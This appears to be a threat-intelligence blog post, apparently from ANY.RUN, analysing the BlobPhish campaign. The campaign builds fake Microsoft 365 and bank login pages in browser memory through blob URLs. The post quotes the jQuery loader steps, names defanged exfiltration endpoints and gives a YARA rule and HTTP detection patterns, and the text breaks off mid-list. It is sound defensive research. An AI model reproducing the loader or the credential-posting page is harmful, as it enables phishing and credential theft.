		<category><![CDATA[cybersecurity]]></category>
		<category><![CDATA[evasion]]></category>
		<category><![CDATA[malware analysis]]></category>
		<category><![CDATA[microsoft365]]></category>
		<category><![CDATA[phishing]]></category>
		<guid isPermaLink="false">https://any.run/cybersecurity-blog/?p=20074</guid>

					<description><![CDATA[<p>ANY.RUN has&#160;observed&#160;a sustained surge in a credential-phishing campaign active since 2024. This campaign, dubbed&#160;BlobPhish, introduces a&#160;sneaky&#160;twist: instead of delivering phishing pages via traditional HTTP requests, it generates them directly inside the victim’s browser using blob objects. The result is a phishing payload that lives entirely in memory, leaving little to no trace in logs, caches, [&#8230;]</p>
<p>The post <a rel="nofollow" href="https://any.run/cybersecurity-blog/evasive-blob-phishing-detection/">BlobPhish: The Phantom Phishing Campaign Hiding in Browser Memory</a> appeared first on <a rel="nofollow" href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>ANY.RUN has&nbsp;observed&nbsp;a sustained surge in a credential-phishing campaign active since 2024. This campaign, dubbed&nbsp;BlobPhish, introduces a&nbsp;sneaky&nbsp;twist: instead of delivering phishing pages via traditional HTTP requests, it <strong>generates them directly inside the victim’s browser using blob objects</strong>. The result is a phishing payload that lives entirely in memory, leaving little to no trace in logs, caches, or network telemetry.&nbsp;</p>



<p>The campaign <strong>targets credentials</strong> across multiple platforms, including Microsoft 365, banking services, and webmail portals, making it both widespread and&nbsp;high-impact.&nbsp;</p>



<h2 class="wp-block-heading">Key Takeaways&nbsp;</h2>



<ul class="wp-block-list">
<li><strong>Memory-resident evasion</strong>:&nbsp;BlobPhish&nbsp;loads entire phishing pages as in-browser blob objects, bypassing file-based and network-based detection entirely.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><strong>Broad targeting:</strong>&nbsp;The campaign hits Microsoft 365 alongside major U.S. banks (Chase, Capital One, FDIC, E*TRADE, Schwab) and webmail services.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><strong>Persistent and active</strong>: First&nbsp;observed&nbsp;in October 2024, the operation continues uninterrupted as of April 2026 with a major spike in February 2026.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><strong>Compromised infrastructure:</strong>&nbsp;Attackers routinely abuse legitimate WordPress sites and reuse exfiltration endpoints (res.php,&nbsp;tele.php,&nbsp;panel.php).&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><strong>High-value credential theft</strong>: Stolen accounts enable BEC, data exfiltration, and lateral movement — threats that carry multimillion-dollar consequences.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><strong>Global but finance-focused:</strong>&nbsp;One-third of victims are in the U.S.; phishing pages&nbsp;almost exclusively&nbsp;mimic premium financial and Microsoft services regardless of victim industry.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><a href="https://any.run/enterprise/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=evasive-blob-phishing-detection&amp;utm_term=160426&amp;utm_content=linktoenterprise" target="_blank" rel="noreferrer noopener"><strong>ANY.RUN delivers proactive defense</strong></a><strong>:</strong>&nbsp;Sandbox instantly reveals blob behavior in real browsers, while TI Lookup and TI Feeds provide real-time IOCs and YARA rules for automated blocking and hunting, turning reactive security into prevention.&nbsp;</li>
</ul>



<h2 class="wp-block-heading">How&nbsp;BlobPhish&nbsp;works&nbsp;</h2>



<p>The attack is based on the abuse of browser Blob objects to serve fake authentication forms. A JavaScript loader, fetched from an attacker-controlled page, constructs a Blob from a Base64-encoded payload and loads it directly into browser memory — never touching disk and never generating the traditional HTTP requests that security tools rely on to detect phishing.&nbsp;</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="489" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_1-1024x489.png" alt="" class="wp-image-20081" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_1-1024x489.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_1-300x143.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_1-768x367.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_1-370x177.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_1-270x129.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_1-740x353.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_1.png 1137w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Phishing pseudo-MS365 page loaded as a blob object</em>&nbsp;</figcaption></figure>



<p>Targeted services&nbsp;include:&nbsp;Microsoft 365, OneDrive, SharePoint, Chase, FDIC, Capital One, E*Trade, American Express, Charles Schwab, Merrill Lynch, PayPal, Intuit, and others.&nbsp;</p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
<span class="highlight"> Accelerate investigations and stop threats earlier. </span><br>Leverage sandbox visibility to improve SOC performance.&nbsp;   
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://app.any.run/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=evasive-blob-phishing-detection&#038;utm_term=160426&#038;utm_content=linktoregistration#register" rel="noopener" target="_blank">
Register now
</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h2 class="wp-block-heading">Technical Deep Dive&nbsp;</h2>



<p>Because the phishing page exists only in memory and is referenced by the scheme&nbsp;<em>blob:https://</em>, it cannot be blocked by URL reputation engines, does not appear in proxy logs as a suspicious request, and leaves no cache artefact. This makes&nbsp;BlobPhish&nbsp;significantly harder to detect and investigate than conventional phishing.&nbsp;</p>



<p><a href="https://app.any.run/tasks/191b74fc-fb9f-455a-9492-ca872871d0e1/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=evasive-blob-phishing-detection&amp;utm_term=160426&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">View the observed analysis session in ANY.RUN sandbox</a>&nbsp;</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="482" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_2-1024x482.png" alt="" class="wp-image-20089" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_2-1024x482.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_2-300x141.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_2-768x361.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_2-1536x723.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_2-370x174.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_2-270x127.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_2-740x348.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_2.png 1841w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Blobphish attack detonated in the sandbox</em>&nbsp;</figcaption></figure>



<h3 class="wp-block-heading">1. Delivery Vector&nbsp;</h3>



<p>The typical&nbsp;initial&nbsp;access point is a phishing email or a link to a trusted-looking service such as&nbsp;DocSend. Example phishing link:&nbsp;hxxps[://]docsend[.]com/view/vsrrknxprh2xt84n&nbsp;<br>&nbsp;<br>Upon clicking, the victim is redirected to an HTML page that&nbsp;contains&nbsp;the loader script. Example loader URL:&nbsp;hxxps[://]mtl-logistics[.]com/blb/blob[.]html&nbsp;</p>



<h3 class="wp-block-heading">2. Loader Script — Step by Step&nbsp;</h3>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="928" height="853" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_3.png" alt="" class="wp-image-20112" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_3.png 928w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_3-300x276.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_3-768x706.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_3-370x340.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_3-270x248.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_3-740x680.png 740w" sizes="(max-width: 928px) 100vw, 928px" /><figcaption class="wp-element-caption"><em>Code responsible for blob object download</em>&nbsp;</figcaption></figure>



<p>The loader uses jQuery to perform the following sequence invisibly to the user:&nbsp;</p>



<ul class="wp-block-list">
<li>var a = $(&#8220;&lt;a style=&#8217;display: none;&#8217;/&gt;&#8221;)&nbsp;<br><em>Creates an invisible HTML anchor&nbsp;element;</em>&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>var&nbsp;decodedStringAtoB&nbsp;=&nbsp;atob(encodedStringAtoB)&nbsp;<br><em>Decodes the Base64&nbsp;payload;</em>&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>const&nbsp;myBlob&nbsp;= new Blob([decodedStringAtoB],&nbsp;{ type: &#8216;text/html&#8217; });&nbsp; →&nbsp;&nbsp;<em>Constructs the Blob&nbsp;object;</em>&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>const&nbsp;url&nbsp;=&nbsp;window.URL.createObjectURL(myBlob)&nbsp;<br><em>Generates the blob:&nbsp;URL;</em>&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>a.attr(&#8220;href&#8221;,&nbsp;url)&nbsp;<br><em>Attaches the URL to the hidden&nbsp;anchor;</em>&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>$(&#8220;body&#8221;).append(a)&nbsp;<br><em>Injects the anchor into the&nbsp;DOM;</em>&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>a[0].click()&nbsp;<br><em>Triggers navigation to the phishing&nbsp;page;</em>&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>window.URL.revokeObjectURL(url); +&nbsp;a.remove()&nbsp;<br><em>Destroys evidence from memory and DOM.</em>&nbsp;</li>
</ul>



<h3 class="wp-block-heading">3. The Phishing Page&nbsp;</h3>



<p>The victim sees a convincing Microsoft 365 (or other financial service) login page. The browser address bar shows the scheme&nbsp;blob:https://, which can appear legitimate to an untrained eye.&nbsp;&nbsp;</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="547" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_4-1024x547.png" alt="" class="wp-image-20115" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_4-1024x547.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_4-300x160.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_4-768x411.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_4-370x198.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_4-270x144.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_4-740x396.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_4.png 1212w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="157" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_5-1-1024x157.png" alt="" class="wp-image-20118" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_5-1-1024x157.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_5-1-300x46.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_5-1-768x118.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_5-1-370x57.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_5-1-270x41.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_5-1-740x113.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_5-1.png 1200w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Code responsible for blob object download</em></figcaption></figure>



<p>The page&nbsp;contains:&nbsp;</p>



<ul class="wp-block-list">
<li>A spoofed credential-capture form:&nbsp;&nbsp;</li>
</ul>


<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="555" height="262" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_6.png" alt="" class="wp-image-20120" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_6.png 555w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_6-300x142.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_6-370x175.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_6-270x127.png 270w" sizes="(max-width: 555px) 100vw, 555px" /><figcaption class="wp-element-caption"><em>Fake login form</em>&nbsp;</figcaption></figure></div>


<ul class="wp-block-list">
<li>Specific set of selectors for the used HTML elements:</li>
</ul>


<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="480" height="227" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_7.png" alt="" class="wp-image-20121" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_7.png 480w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_7-300x142.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_7-370x175.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_7-270x128.png 270w" sizes="(max-width: 480px) 100vw, 480px" /><figcaption class="wp-element-caption"><em>Selector list</em>&nbsp;</figcaption></figure></div>


<ul class="wp-block-list">
<li>Exfiltration logic that POSTs captured credentials to an attacker-controlled endpoint:</li>
</ul>


<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="621" height="124" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_8.png" alt="" class="wp-image-20122" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_8.png 621w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_8-300x60.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_8-370x74.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_8-270x54.png 270w" sizes="(max-width: 621px) 100vw, 621px" /><figcaption class="wp-element-caption"><em>Data exfiltration logic</em>&nbsp;</figcaption></figure></div>


<ul class="wp-block-list">
<li>A failed-login counter to force repeated credential entry (increasing harvest accuracy), a&nbsp;final redirect to the legitimate service website to avoid suspicion:&nbsp;</li>
</ul>


<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="497" height="296" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_9.png" alt="" class="wp-image-20125" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_9.png 497w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_9-300x179.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_9-370x220.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_9-270x161.png 270w" sizes="(max-width: 497px) 100vw, 497px" /><figcaption class="wp-element-caption"><em>Handling failed attempt counters and final redirect</em>&nbsp;</figcaption></figure></div>


<ul class="wp-block-list">
<li>Data is sent via a POST request as form-data:&nbsp;</li>
</ul>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="813" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_10-1024x813.png" alt="" class="wp-image-20129" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_10-1024x813.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_10-300x238.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_10-768x610.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_10-370x294.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_10-270x214.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_10-740x588.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_10.png 1200w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Data exfiltration patterns</em></figcaption></figure>



<p>Observed exfiltration endpoint pattern:&nbsp;</p>



<p>hxxps[://]mtl-logistics[.]com/css/sharethepoint/point/res[.]php&nbsp;</p>



<h3 class="wp-block-heading">4. YARA Detection Rule</h3>



<p>The following YARA rule matches the loader HTML page and <a href="https://intelligence.any.run/analysis/yara?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=evasive-blob-phishing-detection&amp;utm_term=160426&amp;utm_content=linktolookup" target="_blank" rel="noreferrer noopener">can be used</a> in ANY.RUN Threat Intelligence Lookup to hunt for BlobPhish infrastructure: </p>



<pre class="wp-block-code"><code>rule BlobPhishLoaderHTML 

{ 

    meta: 

        author = "ANY.RUN" 

        description = "Matches HTML pages with JS-script which creates and loads 

                       phishing page as blob-object" 

    strings: 

        $s1 = "function saveFile(" ascii 

        $s2 = "var a = $(\"&lt;a style='display: none;'/>\");" fullword ascii 

        $s3 = "var encodedStringAtoB" fullword ascii 

        $s4 = "var decodedStringAtoB = atob(encodedStringAtoB);" fullword ascii 

        $s5 = "window.URL.createObjectURL(myBlob);" fullword ascii 

        $s6 = "window.URL.revokeObjectURL(url);" fullword ascii 

    condition: 

        all of them 

} </code></pre>



<h3 class="wp-block-heading">5. Exfiltration Infrastructure by Target </h3>



<p>Pivoting on&nbsp;url:&#8221;/res.php$&#8221; and via the YARA rule above, ANY.RUN researchers&nbsp;identified&nbsp;multiple targets and corresponding exfiltration URLs.&nbsp;&nbsp;</p>



<h4 class="wp-block-heading"><em>1. Capital One</em>&nbsp;</h4>



<p><a href="https://app.any.run/tasks/04d55695-d952-4a71-b070-4df8fe1112ed/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=evasive-blob-phishing-detection&amp;utm_term=160426&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">View sandbox analysis</a>&nbsp;</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="524" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_11-1024x524.png" alt="" class="wp-image-20135" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_11-1024x524.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_11-300x153.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_11-768x393.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_11-370x189.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_11-270x138.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_11-585x300.png 585w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_11-740x379.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_11.png 1204w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Phishing form imitating Capital One page</em> </figcaption></figure>



<p>Exfiltration URL:&nbsp;hxxps[://]wajah4dslot[.]com/wp-includes/certificates/tmp//res[.]php&nbsp;</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="791" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_12-1024x791.png" alt="" class="wp-image-20136" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_12-1024x791.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_12-300x232.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_12-768x593.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_12-370x286.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_12-270x209.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_12-740x572.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_12.png 1200w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Exfiltration variant</em> </figcaption></figure>



<h4 class="wp-block-heading"><em>2. Chase Banking</em></h4>



<p><a href="https://app.any.run/tasks/4a69d36d-3528-4b5d-b3b7-ed721c449212/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=evasive-blob-phishing-detection&amp;utm_term=160426&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">View sandbox analysis</a>&nbsp;</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="548" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_13-1024x548.png" alt="" class="wp-image-20137" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_13-1024x548.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_13-300x161.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_13-768x411.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_13-370x198.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_13-270x145.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_13-740x396.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_13.png 1214w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Phishing form imitating Chase Banking login page</em></figcaption></figure>



<p>Exfiltration URL:&nbsp;hxxps[://]hnint[.]net/cgi-bin/peacemind//res[.]php&nbsp;</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="224" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_14-1024x224.png" alt="" class="wp-image-20138" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_14-1024x224.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_14-300x66.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_14-768x168.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_14-370x81.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_14-270x59.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_14-740x162.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_14.png 1200w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Yet another exfiltration variant</em></figcaption></figure>



<h4 class="wp-block-heading"><em>3. Morgan Stanley E*Trade</em></h4>



<p><a href="https://app.any.run/tasks/f592a777-38aa-4977-8c16-3d9973a84c19/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=evasive-blob-phishing-detection&amp;utm_term=160426&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">View sandbox analysis</a>&nbsp;</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="568" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_15-1024x568.png" alt="" class="wp-image-20139" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_15-1024x568.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_15-300x166.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_15-768x426.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_15-1536x852.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_15-370x205.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_15-270x150.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_15-740x410.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_15.png 1838w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Sandbox analysis of phishing targeting Morgan Stanley customers</em></figcaption></figure>



<p>Exfiltration URL: hxxps[://]ftpbd[.]net/wp-content/plugins/cgi-/trade/trade//res[.]php</p>


<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="403" height="406" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_16.png" alt="" class="wp-image-20140" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_16.png 403w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_16-298x300.png 298w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_16-150x150.png 150w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_16-70x70.png 70w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_16-370x373.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_16-270x272.png 270w" sizes="(max-width: 403px) 100vw, 403px" /><figcaption class="wp-element-caption"><em>Another exfiltration variant exposed in the sandbox</em></figcaption></figure></div>


<p><br>Variants with exfiltration to url:&#8221;*/tele.php&#8221; with a roughly similar request structure were also observed <a href="https://app.any.run/tasks/a3ecd187-b5a3-4b18-b700-667aed424da7/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=evasive-blob-phishing-detection&amp;utm_term=160426&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">view a sandbox analysis</a> with exfiltration URL hxxps[://]_wildcard_[.]gonzalezlawnandlandscaping[.]com/zovakmf/exfuzaj/pcnlwyf/cgi-ent/tele[.]php.</p>



<p>Importantly, in some cases calls to the service endpoint /panel.php&nbsp;have been&nbsp;observed. In response to a POST request, an&nbsp;error&nbsp;and its description (e.g., &#8220;IP not found&#8221;) are returned.&nbsp;<br>&nbsp;<br>Example POST URL:&nbsp;hxxps[://]hnint[.]net/cgi-bin/peacemind//panel[.]php&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="366" height="162" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_17.png" alt="" class="wp-image-20147" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_17.png 366w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_17-300x133.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_17-270x120.png 270w" sizes="(max-width: 366px) 100vw, 366px" /><figcaption class="wp-element-caption"><em>/panel.php POST error response</em> </figcaption></figure></div>


<h3 class="wp-block-heading">6. HTTP Detection Patterns&nbsp;</h3>



<p>The following HTTP traffic signatures reliably&nbsp;identify&nbsp;BlobPhish&nbsp;activity in proxy and SIEM logs:&nbsp;</p>



<ul class="wp-block-list">
<li>POST */res.php&nbsp; — credentials in body (MIME: form-data or x-www-form-urlencoded);&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>POST */tele.php&nbsp; — credentials in body (MIME: form-data or x-www-form-urlencoded);&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>POST */panel.php&nbsp; — empty body; response: JSON with error &amp; description (e.g., “IP not found”).&nbsp;</li>
</ul>



<h3 class="wp-block-heading">7. Delivery Methods&nbsp;</h3>



<p>The following&nbsp;initial-access vectors have been&nbsp;observed:&nbsp;</p>



<ul class="wp-block-list">
<li>Phishing emails with financial lures (suspicious transaction, personal loan/operation confirmation, invoice &amp; document signature, disputed payment);&nbsp;</li>
</ul>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="438" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_18-1024x438.png" alt="" class="wp-image-20151" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_18-1024x438.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_18-300x128.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_18-768x329.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_18-370x158.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_18-270x115.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_18-740x317.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_18.png 1211w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Fake payment notification email</em></figcaption></figure>



<ul class="wp-block-list">
<li>PDF attachments&nbsp;containing&nbsp;a QR code that leads to a malicious JS page and&nbsp;subsequently&nbsp;the&nbsp;blob:http&nbsp;scheme and */res.php&nbsp;exfiltration pattern (observed&nbsp;in an energy-sector campaign);&nbsp;</li>
</ul>



<ul class="wp-block-list">
